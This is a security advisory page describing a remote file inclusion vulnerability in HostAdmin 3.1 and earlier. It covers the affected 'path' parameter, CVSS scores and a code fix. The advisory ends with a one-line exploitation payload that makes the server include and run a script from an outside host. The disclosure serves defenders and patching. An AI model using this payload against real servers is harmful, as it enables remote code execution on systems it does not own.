HostAdmin <= 3.1 - Remote File Include Vulnerability

2007.02.27
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[MajorSecurity #9]HostAdmin <= 3.1 - Remote File Include Vulnerability ------------------------------------------------------------------------ - Software: HostAdmin Version: <=3.1 Type: Remote File Include Vulnerability Date: June, 3rd 2006 Vendor: dreamcost Page: http://dreamcost.com Risc: High Credits: ---------------------------- Discovered by: David 'Aesthetico' Vieira-Kurz http://www.majorsecurity.de Original Advisory: ---------------------------- http://www.majorsecurity.de/advisory/major_rls9.txt Affected Products: ---------------------------- HostAdmin 3.1 and prior Description: ---------------------------- HostAdmin is designed to automate your entire account and order management, recurring billing, domain registration, server provisioning, and reporting needs. From creating the member account, logging the member in, displaying available hosting and domain registration options, providing a shopping cart and ordering mechanism for the available products, and creating the order record, HostAdmin will handle your requirements with speed and ease. Requirements: ---------------------------- register_globals = On Vulnerability: ---------------------------- Input passed to the "path" parameter in "index.php", "functions.php" and "members.php" is not properly verified, before it is used to include files. This can be exploited to execute arbitrary code by including files from external resources. Solution: ---------------------------- I think you can fix this bug by replacing the following vulnerable code in the this 3 php-files with my one. It should fix the vulnerabilty and solve this problem. Vulnerable one: "include($path . "member_template.html");" MajorSecurity fix: "include("member_template.html");" Set "register_globals" to "Off". Exploitation: ---------------------------- Post data: path=http://www.yourspace.com/yourscript.php?


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top